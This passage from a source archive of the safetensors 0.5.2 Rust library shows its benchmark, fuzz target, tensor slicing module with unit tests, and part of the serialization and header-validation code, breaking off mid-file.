`data_offsets` which are the offsets for the values in the rest of the file. """ exclude = [ "rust-toolchain", "target/*", "Cargo.lock"] # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html [dependencies] hashbrown = { version = "0.15.2", features = ["serde"], optional = true } serde = { version = "1.0", default-features = false, features = ["derive"] } serde_json = { version = "1.0", default-features = false } [dev-dependencies] criterion = "0.5" memmap2 = "0.9" proptest = "1.4" [features] default = ["std"] std = ["serde/default", "serde_json/default"] alloc = ["serde/alloc", "serde_json/alloc", "hashbrown"] [[bench]] name = "benchmark" harness = false safetensors-0.5.2/safetensors/LICENSE000077700000000000000000000000001473753372300206442../LICENSEustar00rootroot00000000000000safetensors-0.5.2/safetensors/README.md000077700000000000000000000000001473753372300213702../README.mdustar00rootroot00000000000000safetensors-0.5.2/safetensors/benches/000077500000000000000000000000001473753372300200335ustar00rootroot00000000000000safetensors-0.5.2/safetensors/benches/benchmark.rs000066400000000000000000000032451473753372300223370ustar00rootroot00000000000000use criterion::{black_box, criterion_group, criterion_main, Criterion}; use safetensors::tensor::*; use std::collections::HashMap; // Returns a sample data of size 2_MB fn get_sample_data() -> (Vec, Vec, Dtype) { let shape = vec![1000, 500]; let dtype = Dtype::F32; let n: usize = shape.iter().product::() * dtype.size(); // 4 let data = vec![0; n]; (data, shape, dtype) } pub fn bench_serialize(c: &mut Criterion) { let (data, shape, dtype) = get_sample_data(); let n_layers = 5; let mut metadata: HashMap = HashMap::new(); // 2_MB x 5 = 10_MB for i in 0..n_layers { let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap(); metadata.insert(format!("weight{i}"), tensor); } c.bench_function("Serlialize 10_MB", |b| { b.iter(|| { let _serialized = serialize(black_box(&metadata), black_box(&None)); }) }); } pub fn bench_deserialize(c: &mut Criterion) { let (data, shape, dtype) = get_sample_data(); let n_layers = 5; let mut metadata: HashMap = HashMap::new(); // 2_MB x 5 = 10_MB for i in 0..n_layers { let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap(); metadata.insert(format!("weight{i}"), tensor); } let out = serialize(&metadata, &None).unwrap(); c.bench_function("Deserlialize 10_MB", |b| { b.iter(|| { let _deserialized = SafeTensors::deserialize(black_box(&out)).unwrap(); }) }); } criterion_group!(bench_ser, bench_serialize); criterion_group!(bench_de, bench_deserialize); criterion_main!(bench_ser, bench_de); safetensors-0.5.2/safetensors/fuzz/000077500000000000000000000000001473753372300174225ustar00rootroot00000000000000safetensors-0.5.2/safetensors/fuzz/.gitignore000066400000000000000000000000411473753372300214050ustar00rootroot00000000000000target corpus artifacts coverage safetensors-0.5.2/safetensors/fuzz/Cargo.toml000066400000000000000000000006251473753372300213550ustar00rootroot00000000000000[package] name = "safetensors-fuzz" version = "0.0.0" publish = false edition = "2021" [package.metadata] cargo-fuzz = true [dependencies] libfuzzer-sys = "0.4" [dependencies.safetensors] path = ".." # Prevent this from interfering with workspaces [workspace] members = ["."] [profile.release] debug = 1 [[bin]] name = "fuzz_target_1" path = "fuzz_targets/fuzz_target_1.rs" test = false doc = false safetensors-0.5.2/safetensors/fuzz/fuzz_targets/000077500000000000000000000000001473753372300221515ustar00rootroot00000000000000safetensors-0.5.2/safetensors/fuzz/fuzz_targets/fuzz_target_1.rs000066400000000000000000000002411473753372300253000ustar00rootroot00000000000000#![no_main] use libfuzzer_sys::fuzz_target; use safetensors::tensor::SafeTensors; fuzz_target!(|data: &[u8]| { let _ = SafeTensors::deserialize(data); }); safetensors-0.5.2/safetensors/src/000077500000000000000000000000001473753372300172135ustar00rootroot00000000000000safetensors-0.5.2/safetensors/src/lib.rs000066400000000000000000000025471473753372300203370ustar00rootroot00000000000000#![deny(missing_docs)] #![doc = include_str!("../README.md")] #![cfg_attr(not(feature = "std"), no_std)] pub mod slice; pub mod tensor; /// serialize_to_file only valid in std #[cfg(feature = "std")] pub use tensor::serialize_to_file; pub use tensor::{serialize, Dtype, SafeTensorError, SafeTensors, View}; #[cfg(feature = "alloc")] #[macro_use] extern crate alloc; #[cfg(all(feature = "std", feature = "alloc"))] compile_error!("must choose either the `std` or `alloc` feature, but not both."); #[cfg(all(not(feature = "std"), not(feature = "alloc")))] compile_error!("must choose either the `std` or `alloc` feature"); /// A facade around all the types we need from the `std`, `core`, and `alloc` /// crates. This avoids elaborate import wrangling having to happen in every /// module. mod lib { #[cfg(not(feature = "std"))] mod no_stds { pub use alloc::borrow::Cow; pub use alloc::string::{String, ToString}; pub use alloc::vec::Vec; pub use hashbrown::HashMap; } #[cfg(feature = "std")] mod stds { pub use std::borrow::Cow; pub use std::collections::HashMap; pub use std::string::{String, ToString}; pub use std::vec::Vec; } /// choose std or no_std to export by feature flag #[cfg(not(feature = "std"))] pub use no_stds::*; #[cfg(feature = "std")] pub use stds::*; } safetensors-0.5.2/safetensors/src/slice.rs000066400000000000000000000460341473753372300206670ustar00rootroot00000000000000//! Module handling lazy loading via iterating on slices on the original buffer. use crate::lib::{String, ToString, Vec}; use crate::tensor::TensorView; use core::ops::{ Bound, Range, RangeBounds, RangeFrom, RangeFull, RangeInclusive, RangeTo, RangeToInclusive, }; /// Error representing invalid slicing attempt #[derive(Debug)] pub enum InvalidSlice { /// When the client asked for more slices than the tensors has dimensions TooManySlices, /// When the client asked for a slice that exceeds the allowed bounds SliceOutOfRange { /// The rank of the dimension that has the out of bounds dim_index: usize, /// The problematic value asked: usize, /// The dimension size we shouldn't go over. dim_size: usize, }, } #[derive(Debug, Clone)] /// Generic structure used to index a slice of the tensor pub enum TensorIndexer { /// This is selecting an entire dimension Select(usize), /// This is a regular slice, purely indexing a chunk of the tensor Narrow(Bound, Bound), //IndexSelect(Tensor), } fn display_bound(bound: &Bound) -> String { match bound { Bound::Unbounded => "".to_string(), Bound::Excluded(n) => format!("{n}"), Bound::Included(n) => format!("{n}"), } } /// Intended for Python users mostly or at least for its conventions impl core::fmt::Display for TensorIndexer { fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result { match self { TensorIndexer::Select(n) => { write!(f, "{n}") } TensorIndexer::Narrow(left, right) => { write!(f, "{}:{}", display_bound(left), display_bound(right)) } } } } impl From for TensorIndexer { fn from(index: usize) -> Self { TensorIndexer::Select(index) } } // impl From<&[usize]> for TensorIndexer { // fn from(index: &[usize]) -> Self { // let tensor = index.into(); // TensorIndexer::IndexSelect(tensor) // } // } // // impl From> for TensorIndexer { // fn from(index: Vec) -> Self { // let tensor = Tensor::of_slice(&index); // TensorIndexer::IndexSelect(tensor) // } // } macro_rules! impl_from_range { ($range_type:ty) => { impl From<$range_type> for TensorIndexer { fn from(range: $range_type) -> Self { use core::ops::Bound::*; let start = match range.start_bound() { Included(idx) => Included(*idx), Excluded(idx) => Excluded(*idx), Unbounded => Unbounded, }; let end = match range.end_bound() { Included(idx) => Included(*idx), Excluded(idx) => Excluded(*idx), Unbounded => Unbounded, }; TensorIndexer::Narrow(start, end) } } }; } impl_from_range!(Range); impl_from_range!(RangeFrom); impl_from_range!(RangeFull); impl_from_range!(RangeInclusive); impl_from_range!(RangeTo); impl_from_range!(RangeToInclusive); /// Trait used to implement multiple signatures for ease of use of the slicing /// of a tensor pub trait IndexOp<'data, T> { /// Returns a slicing iterator which are the chunks of data necessary to /// reconstruct the desired tensor. fn slice(&'data self, index: T) -> Result, InvalidSlice>; } impl<'data, A> IndexOp<'data, A> for TensorView<'data> where A: Into, { fn slice(&'data self, index: A) -> Result, InvalidSlice> { self.sliced_data(&[index.into()]) } } impl<'data, A> IndexOp<'data, (A,)> for TensorView<'data> where A: Into, { fn slice(&'data self, index: (A,)) -> Result, InvalidSlice> { let idx_a = index.0.into(); self.sliced_data(&[idx_a]) } } impl<'data, A, B> IndexOp<'data, (A, B)> for TensorView<'data> where A: Into, B: Into, { fn slice(&'data self, index: (A, B)) -> Result, InvalidSlice> { let idx_a = index.0.into(); let idx_b = index.1.into(); self.sliced_data(&[idx_a, idx_b]) } } impl<'data, A, B, C> IndexOp<'data, (A, B, C)> for TensorView<'data> where A: Into, B: Into, C: Into, { fn slice(&'data self, index: (A, B, C)) -> Result, InvalidSlice> { let idx_a = index.0.into(); let idx_b = index.1.into(); let idx_c = index.2.into(); self.sliced_data(&[idx_a, idx_b, idx_c]) } } // impl IndexOp<(A, B, C, D)> for TensorView<'data> // where // A: Into, // B: Into, // C: Into, // D: Into, // { // fn slice(&self, index: (A, B, C, D)) -> TensorView<'data> { // let idx_a = index.0.into(); // let idx_b = index.1.into(); // let idx_c = index.2.into(); // let idx_d = index.3.into(); // self.sliced_data(&[idx_a, idx_b, idx_c, idx_d]) // } // } // // impl IndexOp<(A, B, C, D, E)> for TensorView<'data> // where // A: Into, // B: Into, // C: Into, // D: Into, // E: Into, // { // fn slice(&self, index: (A, B, C, D, E)) -> TensorView<'data> { // let idx_a = index.0.into(); // let idx_b = index.1.into(); // let idx_c = index.2.into(); // let idx_d = index.3.into(); // let idx_e = index.4.into(); // self.sliced_data(&[idx_a, idx_b, idx_c, idx_d, idx_e]) // } // } // // impl IndexOp<(A, B, C, D, E, F)> for TensorView<'data> // where // A: Into, // B: Into, // C: Into, // D: Into, // E: Into, // F: Into, // { // fn slice(&self, index: (A, B, C, D, E, F)) -> TensorView<'data> { // let idx_a = index.0.into(); // let idx_b = index.1.into(); // let idx_c = index.2.into(); // let idx_d = index.3.into(); // let idx_e = index.4.into(); // let idx_f = index.5.into(); // self.sliced_data(&[idx_a, idx_b, idx_c, idx_d, idx_e, idx_f]) // } // } // // impl IndexOp<(A, B, C, D, E, F, G)> for TensorView<'data> // where // A: Into, // B: Into, // C: Into, // D: Into, // E: Into, // F: Into, // G: Into, // { // fn slice(&self, index: (A, B, C, D, E, F, G)) -> TensorView<'data> { // let idx_a = index.0.into(); // let idx_b = index.1.into(); // let idx_c = index.2.into(); // let idx_d = index.3.into(); // let idx_e = index.4.into(); // let idx_f = index.5.into(); // let idx_g = index.6.into(); // self.sliced_data(&[idx_a, idx_b, idx_c, idx_d, idx_e, idx_f, idx_g]) // } // } /// Iterator used to return the bits of the overall tensor buffer /// when client asks for a slice of the original tensor. pub struct SliceIterator<'data> { view: &'data TensorView<'data>, indices: Vec<(usize, usize)>, newshape: Vec, } impl<'data> SliceIterator<'data> { pub(crate) fn new( view: &'data TensorView<'data>, slices: &[TensorIndexer], ) -> Result { // Make sure n. axis does not exceed n. of dimensions let n_slice = slices.len(); let n_shape = view.shape().len(); if n_slice > n_shape { return Err(InvalidSlice::TooManySlices); } let mut newshape = Vec::with_capacity(view.shape().len()); // Minimum span is the span of 1 item; let mut span = view.dtype().size(); let mut indices = vec![]; // Everything is row major. for (i, &shape) in view.shape().iter().enumerate().rev() { if i >= slices.len() { // We are not slicing yet, just increase the local span newshape.push(shape); } else { let slice = &slices[i]; let (start, stop) = match slice { TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded) => (0, shape), TensorIndexer::Narrow(Bound::Unbounded, Bound::Excluded(stop)) => (0, *stop), TensorIndexer::Narrow(Bound::Unbounded, Bound::Included(stop)) => { (0, *stop + 1) } TensorIndexer::Narrow(Bound::Included(s), Bound::Unbounded) => (*s, shape), TensorIndexer::Narrow(Bound::Included(s), Bound::Excluded(stop)) => (*s, *stop), TensorIndexer::Narrow(Bound::Included(s), Bound::Included(stop)) => { (*s, *stop + 1) } TensorIndexer::Narrow(Bound::Excluded(s), Bound::Unbounded) => (*s + 1, shape), TensorIndexer::Narrow(Bound::Excluded(s), Bound::Excluded(stop)) => { (*s + 1, *stop) } TensorIndexer::Narrow(Bound::Excluded(s), Bound::Included(stop)) => { (*s + 1, *stop + 1) } TensorIndexer::Select(s) => (*s, *s + 1), }; if start >= shape && stop > shape { return Err(InvalidSlice::SliceOutOfRange { dim_index: i, asked: stop.saturating_sub(1), dim_size: shape, }); } if let TensorIndexer::Narrow(..) = slice { newshape.push(stop - start); } if indices.is_empty() { if start == 0 && stop == shape { // We haven't started to slice yet, just increase the span } else { let offset = start * span; let small_span = stop * span - offset; indices.push((offset, offset + small_span)); } } else { let capacity = (stop - start) * indices.len(); let mut newindices = Vec::with_capacity(capacity); for n in start..stop { let offset = n * span; for (old_start, old_stop) in &indices { newindices.push((old_start + offset, old_stop + offset)); } } indices = newindices; } } span *= shape; } if indices.is_empty() { indices.push((0, view.data().len())); } // Reversing so we can pop faster while iterating on the slice let indices = indices.into_iter().rev().collect(); let newshape = newshape.into_iter().rev().collect(); Ok(Self { view, indices, newshape, }) } /// Gives back the amount of bytes still being in the iterator pub fn remaining_byte_len(&self) -> usize { self.indices .iter() .map(|(start, stop)| (stop - start)) .sum() } /// Gives back the amount of bytes still being in the iterator pub fn newshape(&self) -> Vec { self.newshape.clone() } } impl<'data> Iterator for SliceIterator<'data> { type Item = &'data [u8]; fn next(&mut self) -> Option { // TODO We might want to move the logic from `new` // here actually to remove the need to get all the indices // upfront. let (start, stop) = self.indices.pop()?; Some(&self.view.data()[start..stop]) } } #[cfg(test)] mod tests { use super::*; use crate::tensor::{Dtype, TensorView}; #[test] fn test_helpers() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let attn_0 = TensorView::new(Dtype::F32, vec![1, 2, 3], &data).unwrap(); let iterator = SliceIterator::new( &attn_0, &[TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded)], ) .unwrap(); assert_eq!(iterator.remaining_byte_len(), 24); assert_eq!(iterator.newshape(), vec![1, 2, 3]); let iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Included(0), Bound::Excluded(1)), ], ) .unwrap(); assert_eq!(iterator.remaining_byte_len(), 12); assert_eq!(iterator.newshape(), vec![1, 1, 3]); } #[test] fn test_dummy() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let attn_0 = TensorView::new(Dtype::F32, vec![1, 2, 3], &data).unwrap(); let mut iterator = SliceIterator::new( &attn_0, &[TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded)], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..24])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..24])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..24])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..24])); assert_eq!(iterator.next(), None); assert!(SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), ], ) .is_err(),); } #[test] fn test_slice_variety() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let attn_0 = TensorView::new(Dtype::F32, vec![1, 2, 3], &data).unwrap(); let mut iterator = SliceIterator::new( &attn_0, &[TensorIndexer::Narrow( Bound::Included(0), Bound::Excluded(1), )], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..24])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Included(0), Bound::Excluded(1)), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..12])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Included(0), Bound::Excluded(1)), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..4])); assert_eq!(iterator.next(), Some(&data[12..16])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Included(1), Bound::Excluded(2)), TensorIndexer::Narrow(Bound::Included(0), Bound::Excluded(1)), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[12..16])); assert_eq!(iterator.next(), None); } #[test] fn test_slice_variety2() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let attn_0 = TensorView::new(Dtype::F32, vec![2, 3], &data).unwrap(); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Included(1), Bound::Excluded(3)), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[4..12])); assert_eq!(iterator.next(), Some(&data[16..24])); assert_eq!(iterator.next(), None); } #[test] fn test_slice_select() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let attn_0 = TensorView::new(Dtype::F32, vec![2, 3], &data).unwrap(); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Select(1), TensorIndexer::Narrow(Bound::Included(1), Bound::Excluded(3)), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[16..24])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Select(0), TensorIndexer::Narrow(Bound::Included(1), Bound::Excluded(3)), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[4..12])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Included(1), Bound::Excluded(2)), TensorIndexer::Select(0), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[12..16])); assert_eq!(iterator.next(), None); } } safetensors-0.5.2/safetensors/src/tensor.rs000066400000000000000000001263761473753372300211120ustar00rootroot00000000000000//! Module Containing the most important structures use crate::lib::{Cow, HashMap, String, ToString, Vec}; use crate::slice::{InvalidSlice, SliceIterator, TensorIndexer}; use serde::{ser::SerializeMap, Deserialize, Deserializer, Serialize, Serializer}; #[cfg(feature = "std")] use std::io::Write; const MAX_HEADER_SIZE: usize = 100_000_000; /// Possible errors that could occur while reading /// A Safetensor file. #[derive(Debug)] pub enum SafeTensorError { /// The header is an invalid UTF-8 string and cannot be read. InvalidHeader, /// The header's first byte is not the expected `{`. InvalidHeaderStart, /// The header does contain a valid string, but it is not valid JSON. InvalidHeaderDeserialization, /// The header is large than 100Mo which is considered too large (Might evolve in the future). HeaderTooLarge, /// The header is smaller than 8 bytes HeaderTooSmall, /// The header length is invalid InvalidHeaderLength, /// The tensor name was not found in the archive TensorNotFound(String), /// Invalid information between shape, dtype and the proposed offsets in the file TensorInvalidInfo, /// The offsets declared for tensor with name `String` in the header are invalid InvalidOffset(String), /// IoError #[cfg(feature = "std")] IoError(std::io::Error), /// JSON error JsonError(serde_json::Error), /// The follow tensor cannot be created because the buffer size doesn't match shape + dtype InvalidTensorView(Dtype, Vec, usize), /// The metadata is invalid because the data offsets of the tensor does not /// fully cover the buffer part of the file. The last offset **must** be /// the end of the file. MetadataIncompleteBuffer, /// The metadata contains information (shape or shape * dtype size) which lead to an /// arithmetic overflow. This is most likely an error in the file. ValidationOverflow, } #[cfg(feature = "std")] impl From for SafeTensorError { fn from(error: std::io::Error) -> SafeTensorError { SafeTensorError::IoError(error) } } impl From for SafeTensorError { fn from(error: serde_json::Error) -> SafeTensorError { SafeTensorError::JsonError(error) } } impl core::fmt::Display for SafeTensorError { fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result { write!(f, "{self:?}") } } impl core::error::Error for SafeTensorError {} struct PreparedData { n: u64, header_bytes: Vec, offset: usize, } /// The trait necessary to enable safetensors to serialize a tensor /// If you have an owned tensor like this: /// /// ```rust /// use safetensors::tensor::{View, Dtype}; /// use std::borrow::Cow; /// struct Tensor{ dtype: MyDtype, shape: Vec, data: Vec} /// /// # type MyDtype = Dtype; /// impl<'data> View for &'data Tensor{ /// fn dtype(&self) -> Dtype{ /// self.dtype.into() /// } /// fn shape(&self) -> &[usize]{ /// &self.shape /// } /// fn data(&self) -> Cow<[u8]>{ /// (&self.data).into() /// } /// fn data_len(&self) -> usize{ /// self.data.len() /// } /// } /// ``` /// /// For a borrowed tensor: /// /// ```rust /// use safetensors::tensor::{View, Dtype}; /// use std::borrow::Cow; /// struct Tensor<'data>{ dtype: MyDtype, shape: Vec, data: &'data[u8]} /// /// # type MyDtype = Dtype; /// impl<'data> View for Tensor<'data>{ /// fn dtype(&self) -> Dtype{ /// self.dtype.into() /// } /// fn shape(&self) -> &[usize]{ /// &self.shape /// } /// fn data(&self) -> Cow<[u8]>{ /// self.data.into() /// } /// fn data_len(&self) -> usize{ /// self.data.len() /// } /// } /// ``` /// /// Now if you have some unknown buffer that could be on GPU for instance, /// you can implement the trait to return an owned local buffer containing the data /// on CPU (needed to write on disk) /// ```rust /// use safetensors::tensor::{View, Dtype}; /// use std::borrow::Cow; /// /// # type MyDtype = Dtype; /// # type OpaqueGpu = Vec; /// struct Tensor{ dtype: MyDtype, shape: Vec, data: OpaqueGpu } /// /// impl View for Tensor{ /// fn dtype(&self) -> Dtype{ /// self.dtype.into() /// } /// fn shape(&self) -> &[usize]{ /// &self.shape /// } /// fn data(&self) -> Cow<[u8]>{ /// // This copies data from GPU to CPU. /// let data: Vec = self.data.to_vec(); /// data.into() /// } /// fn data_len(&self) -> usize{ /// let n: usize = self.shape.iter().product(); /// let bytes_per_element = self.dtype.size(); /// n * bytes_per_element /// } /// } /// ``` pub trait View { /// The `Dtype` of the tensor fn dtype(&self) -> Dtype; /// The shape of the tensor fn shape(&self) -> &[usize]; /// The data of the tensor fn data(&self) -> Cow<[u8]>; /// The length of the data, in bytes. /// This is necessary as this might be faster to get than `data().len()` /// for instance for tensors residing in GPU. fn data_len(&self) -> usize; } fn prepare + Ord + core::fmt::Display, V: View, I: IntoIterator>( data: I, data_info: &Option>, // ) -> Result<(Metadata, Vec<&'hash TensorView<'data>>, usize), SafeTensorError> { ) -> Result<(PreparedData, Vec), SafeTensorError> { // Make sure we're sorting by descending dtype alignment // Then by name let mut data: Vec<_> = data.into_iter().collect(); data.sort_by(|(lname, left), (rname, right)| { right.dtype().cmp(&left.dtype()).then(lname.cmp(rname)) }); let mut tensors: Vec = Vec::with_capacity(data.len()); let mut hmetadata = Vec::with_capacity(data.len()); let mut offset = 0; let data: Vec<_> = data.into_iter().collect(); for (name, tensor) in data { let n = tensor.data_len(); let tensor_info = TensorInfo { dtype: tensor.dtype(), shape: tensor.shape().to_vec(), data_offsets: (offset, offset + n), }; offset += n; hmetadata.push((name.to_string(), tensor_info)); tensors.push(tensor); } let metadata: Metadata = Metadata::new(data_info.clone(), hmetadata)?; let mut metadata_buf = serde_json::to_string(&metadata)?.into_bytes(); // Force alignment to 8 bytes. let extra = (8 - metadata_buf.len() % 8) % 8; metadata_buf.extend(vec![b' '; extra]); let n: u64 = metadata_buf.len() as u64; Ok(( PreparedData { n, header_bytes: metadata_buf, offset, }, tensors, )) } /// Serialize to an owned byte buffer the dictionnary of tensors. pub fn serialize< S: AsRef + Ord + core::fmt::Display, V: View, I: IntoIterator, >( data: I, data_info: &Option>, ) -> Result, SafeTensorError> { let ( PreparedData { n, header_bytes, offset, }, tensors, ) = prepare(data, data_info)?; let expected_size = 8 + header_bytes.len() + offset; let mut buffer: Vec = Vec::with_capacity(expected_size); buffer.extend(&n.to_le_bytes().to_vec()); buffer.extend(&header_bytes); for tensor in tensors { buffer.extend(tensor.data().as_ref()); } Ok(buffer) } /// Serialize to a regular file the dictionnary of tensors. /// Writing directly to file reduces the need to allocate the whole amount to /// memory. #[cfg(feature = "std")] pub fn serialize_to_file< S: AsRef + Ord + core::fmt::Display, V: View, I: IntoIterator, >( data: I, data_info: &Option>, filename: &std::path::Path, ) -> Result<(), SafeTensorError> { let ( PreparedData { n, header_bytes, .. }, tensors, ) = prepare(data, data_info)?; let mut f = std::io::BufWriter::new(std::fs::File::create(filename)?); f.write_all(n.to_le_bytes().as_ref())?; f.write_all(&header_bytes)?; for tensor in tensors { f.write_all(tensor.data().as_ref())?; } f.flush()?; Ok(()) } /// A structure owning some metadata to lookup tensors on a shared `data` /// byte-buffer (not owned). #[derive(Debug)] pub struct SafeTensors<'data> { metadata: Metadata, data: &'data [u8], } impl<'data> SafeTensors<'data> { /// Given a byte-buffer representing the whole safetensor file /// parses the header, and returns the size of the header + the parsed data. pub fn read_metadata<'in_data>( buffer: &'in_data [u8], ) -> Result<(usize, Metadata), SafeTensorError> where 'in_data: 'data, { let buffer_len = buffer.len(); if buffer_len < 8 { return Err(SafeTensorError::HeaderTooSmall); } let arr: [u8; 8] = [ buffer[0], buffer[1], buffer[2], buffer[3], buffer[4], buffer[5], buffer[6], buffer[7], ]; let n: usize = u64::from_le_bytes(arr) .try_into() .map_err(|_| SafeTensorError::HeaderTooLarge)?; if n > MAX_HEADER_SIZE { return Err(SafeTensorError::HeaderTooLarge); } let stop = n .checked_add(8) .ok_or(SafeTensorError::InvalidHeaderLength)?; if stop > buffer_len { return Err(SafeTensorError::InvalidHeaderLength); } let string = core::str::from_utf8(&buffer[8..stop]).map_err(|_| SafeTensorError::InvalidHeader)?; // Assert the string starts with { // NOTE: Add when we move to 0.4.0 // if !string.starts_with('{') { // return Err(SafeTensorError::InvalidHeaderStart); // } let metadata: Metadata = serde_json::from_str(string) .map_err(|_| SafeTensorError::InvalidHeaderDeserialization)?; let buffer_end = metadata.validate()?; if buffer_end + 8 + n != buffer_len { return Err(SafeTensorError::MetadataIncompleteBuffer); } Ok((n, metadata)) } /// Given a byte-buffer representing the whole safetensor file /// parses it and returns the Deserialized form (No Tensor allocation). /// /// ``` /// use safetensors::SafeTensors; /// use memmap2::MmapOptions; /// use std::fs::File; /// /// let filename = "model.safetensors"; /// # use std::io::Write; /// # let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; /// # File::create(filename).unwrap().write(serialized).unwrap(); /// let file = File::open(filename).unwrap(); /// let buffer = unsafe { MmapOptions::new().map(&file).unwrap() }; /// let tensors = SafeTensors::deserialize(&buffer).unwrap(); /// let tensor = tensors /// .tensor("test") /// .unwrap(); /// ``` pub fn deserialize<'in_data>(buffer: &'in_data [u8]) -> Result where 'in_data: 'data, { let (n, metadata) = SafeTensors::read_metadata(buffer)?; let data = &buffer[n + 8..]; Ok(Self { metadata, data }) } /// Returns the tensors contained within the SafeTensors. /// The tensors returned are merely views and the data is not owned by this /// structure. pub fn tensors(&self) -> Vec<(String, TensorView<'data>)> { let mut tensors = Vec::with_capacity(self.metadata.index_map.len()); for (name, &index) in &self.metadata.index_map { let info = &self.metadata.tensors[index]; let tensorview = TensorView { dtype: info.dtype, shape: info.shape.clone(), data: &self.data[info.data_offsets.0..info.data_offsets.1], }; tensors.push((name.to_string(), tensorview)); } tensors } /// Returns an iterator over the tensors contained within the SafeTensors. /// The tensors returned are merely views and the data is not owned by this /// structure. pub fn iter<'a>(&'a self) -> impl Iterator)> { self.metadata.index_map.iter().map(|(name, &idx)| { let info = &self.metadata.tensors[idx]; ( name.as_str(), TensorView { dtype: info.dtype, shape: info.shape.clone(), data: &self.data[info.data_offsets.0..info.data_offsets.1], }, ) }) } /// Allow the user to get a specific tensor within the SafeTensors. /// The tensor returned is merely a view and the data is not owned by this /// structure. pub fn tensor(&self, tensor_name: &str) -> Result, SafeTensorError> { if let Some(index) = &self.metadata.index_map.get(tensor_name) { if let Some(info) = &self.metadata.tensors.get(**index) { Ok(TensorView { dtype: info.dtype, shape: info.shape.clone(), data: &self.data[info.data_offsets.0..info.data_offsets.1], }) } else { Err(SafeTensorError::TensorNotFound(tensor_name.to_string())) } } else { Err(SafeTensorError::TensorNotFound(tensor_name.to_string())) } } /// Return the names of the tensors within the SafeTensors. /// These are used as keys to access to the actual tensors, that can be /// retrieved using the tensor method. pub fn names(&self) -> Vec<&'_ String> { self.metadata.index_map.keys().collect() } /// Return how many tensors are currently stored within the SafeTensors. #[inline] pub fn len(&self) -> usize { self.metadata.tensors.len() } /// Indicate if the SafeTensors contains or not any tensor. #[inline] pub fn is_empty(&self) -> bool { self.metadata.tensors.is_empty() } } /// The stuct representing the header of safetensor files which allow /// indexing into the raw byte-buffer array and how to interpret it. #[derive(Debug, Clone)] pub struct Metadata { metadata: Option>, tensors: Vec, index_map: HashMap, } /// Helper struct used only for serialization deserialization #[derive(Serialize, Deserialize)] struct HashMetadata { #[serde(skip_serializing_if = "Option::is_none")] #[serde(rename = "__metadata__")] metadata: Option>, #[serde(flatten)] tensors: HashMap, } impl<'de> Deserialize<'de> for Metadata { fn deserialize(deserializer: D) 